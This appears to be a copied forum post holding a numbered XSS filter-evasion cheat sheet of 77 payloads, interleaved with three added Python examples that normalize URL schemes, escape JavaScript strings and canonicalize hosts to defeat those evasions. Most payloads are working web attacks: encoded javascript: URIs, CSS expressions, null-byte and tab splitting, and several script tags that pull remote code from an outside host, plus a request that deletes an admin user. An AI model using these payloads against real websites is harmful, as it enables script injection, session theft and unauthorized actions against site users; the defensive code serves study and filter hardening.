12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
t00ls seems to have rather little material on XSS. I saw something good and copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters are basically ineffective in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
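Items (3) through (19) all defeat the same weak filter: one that looks for the literal string javascript: in an attribute value. The following is an added example, not part of the original post or the cheat sheet it copies. It normalizes the attribute value the way a browser does (decodes character references with or without the semicolon, drops NUL, tab, newline, carriage return and other control characters) and then allows only an explicit list of schemes, so the variants above all collapse to the same rejected scheme. The function names, the allowlist and the sample values are my own constructions modelled on the items above.

```python
import html
import re
from typing import Optional

# Browsers ignore NUL, tab, newline, carriage return and other C0 controls
# inside a URL scheme, so drop every code point <= 0x20 before inspecting it.
# This is stricter than the URL spec, which is the right side to err on for
# a gatekeeper check.
_IGNORED = re.compile(r"[\x00-\x20]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

# Allowlist (assumption for this example): anything not listed is rejected,
# which covers javascript:, vbscript:, data: and any scheme added later.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def naive_is_blocked(value: str) -> bool:
    """The check the cheat sheet defeats: search for the literal string."""
    return "javascript:" in value.lower()


def normalize_attr_value(value: str) -> str:
    """Reduce an attribute value to what the browser actually interprets.

    1. Decode HTML character references, with or without the trailing
       semicolon (&#106; and &#106 both become 'j').
    2. Remove control characters and spaces (jav\tascript -> javascript).
    """
    return _IGNORED.sub("", html.unescape(value))


def extract_scheme(value: str) -> Optional[str]:
    """Lower-cased URL scheme of the normalized value, or None if relative."""
    match = _SCHEME.match(normalize_attr_value(value))
    return match.group(1).lower() if match else None


def is_allowed_url(value: str) -> bool:
    """True only for relative URLs and URLs whose scheme is on the allowlist."""
    scheme = extract_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed samples modelled on items (3)-(19). The entity-encoded ones
# spell out j-a-v-a-s-c-r-i-p-t-: in decimal and in hex references.
SAMPLES = {
    "plain":             "javascript:alert('XSS')",
    "mixed_case":        "JaVaScRiPt:alert('XSS')",
    "decimal_entities":  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "hex_no_semicolon":  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "embedded_tab":      "jav\tascript:alert('XSS')",
    "encoded_tab":       "jav&#x09;ascript:alert('XSS')",
    "embedded_newline":  "jav\nascript:alert('XSS')",
    "null_byte":         "java\x00script:alert('XSS')",
    "leading_space":     " javascript:alert('XSS')",
    "protocol_relative": "//www.example.com/",
    "https":             "https://www.example.com/",
}


def classify_samples() -> dict:
    """Map each sample name to (normalized scheme, allowed?)."""
    return {name: (extract_scheme(v), is_allowed_url(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (scheme, allowed) in classify_samples().items():
        print(f"{name:18} naive_blocked={naive_is_blocked(SAMPLES[name])!s:5} "
              f"scheme={scheme!r:14} allowed={allowed}")
```

This is a scheme check for URL-valued attributes only, not an HTML sanitizer: a remote http: script as in items (1) and (2) still passes the scheme test and has to be handled by the surrounding markup policy.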
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double opening angle bracket
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
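Item (29) works against an escaper that turns a double quote into \" but leaves the backslash alone: the injected backslash cancels the added one and the quote ends the string literal. As an added example that is not from the original post, here is that flawed escaper beside a JSON-based one, with a small scanner that checks whether the resulting JavaScript literal still ends where the template intended. Function names and the payload constant are my own; the payload is constructed from item (29).

```python
import json

# Constructed input modelled on item (29): a backslash, a double quote, then code.
PAYLOAD = '\\";alert(\'XSS\');//'


def naive_js_string(value: str) -> str:
    """Flawed escaper: escapes the quote but not the backslash in front of it."""
    return '"' + value.replace('"', '\\"') + '"'


def safe_js_string(value: str) -> str:
    """JSON-encode the value (backslash, quotes and control characters are all
    escaped) and additionally hex-escape the characters that matter to the
    HTML parser around a <script> block, so the value can end neither the
    string literal nor the script element."""
    encoded = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        encoded = encoded.replace(ch, esc)
    return encoded


def closing_quote_index(literal: str) -> int:
    """Index of the quote that terminates the JS string literal starting at
    literal[0], honouring backslash escapes; -1 if it never terminates."""
    i = 1
    while i < len(literal):
        if literal[i] == "\\":
            i += 2          # an escaped character can never close the string
            continue
        if literal[i] == '"':
            return i
        i += 1
    return -1


def breaks_out(literal: str) -> bool:
    """True if the literal ends before its final quote, i.e. the rest of the
    value is parsed as code rather than as string content."""
    return closing_quote_index(literal) != len(literal) - 1


if __name__ == "__main__":
    for name, escaper in (("naive", naive_js_string), ("safe", safe_js_string)):
        literal = escaper(PAYLOAD)
        print(f"{name:5} var x = {literal};   breaks out: {breaks_out(literal)}")
```

The lesson generalizes: an escaper must handle the escape character itself first, and a value placed inside a script block must also be safe against the HTML parser, which does not know about JavaScript string boundaries.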
(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Trailing dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
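Items (70) through (76) are all ways of writing one host so that a plain string comparison against a link allowlist or blocklist fails. The following is an added example, not part of the original post. It removes the whitespace that browsers ignore in a URL, parses an IPv4 host the way inet_aton does (decimal, hex, octal, shortened and mixed forms), drops the trailing dot, and returns a single canonical host for the policy to compare. Mirroring inet_aton semantics is an assumption about what the consuming browser does; the function names and the sample URLs are my own, modelled on items (70)-(73) and (76).

```python
import re
from typing import Optional
from urllib.parse import urlsplit

_IGNORED = re.compile(r"[\x00-\x20]")        # tab/newline/space that browsers drop
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|[0-9]+)$")


def _parse_part(part: str) -> int:
    """One dotted component, inet_aton style: 0x.. hex, leading 0 octal, else decimal."""
    if not _PART.match(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)                  # raises ValueError on digits 8 or 9
    return int(part, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of an IPv4 literal written in any inet_aton notation
    (a.b.c.d, a.b.c, a.b or a, each part decimal, hex or octal); None if the
    host is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    tail_bytes = 5 - len(parts)              # the last part fills the remaining bytes
    if any(v > 255 for v in values[:-1]) or values[-1] >= 256 ** tail_bytes:
        return None
    n = 0
    for v in values[:-1]:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | values[-1]
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> Optional[str]:
    """Host to compare against a policy: ignored whitespace removed, trailing
    dot dropped, IPv4 literals rewritten as dotted quad, names lower-cased."""
    cleaned = _IGNORED.sub("", url)
    host = urlsplit(cleaned).hostname        # urlsplit lower-cases the host
    if host is None:
        return None
    host = host.rstrip(".")
    return canonical_ipv4(host) or host


# Constructed samples modelled on items (70)-(73) and (76).
SAMPLES = [
    "http://3232235521",
    "http://0xc0.0xa8.0x00.0x01",
    "http://0300.0250.0000.0001",
    "h\ntt\tp://6\t6.000146.0x7.147/",
    "http://www.google.com./",
]


def canonical_forms() -> dict:
    """Map each sample URL to the host the policy would actually compare."""
    return {u: canonical_host(u) for u in SAMPLES}


if __name__ == "__main__":
    for url, host in canonical_forms().items():
        print(f"{url!r:40} -> {host}")
```

Compare policies against the value canonical_host returns, never against the raw HREF; the first three samples are the same 192.168.0.1 and the mixed-notation one is 66.102.7.147, which no substring match on the original strings would reveal.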
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14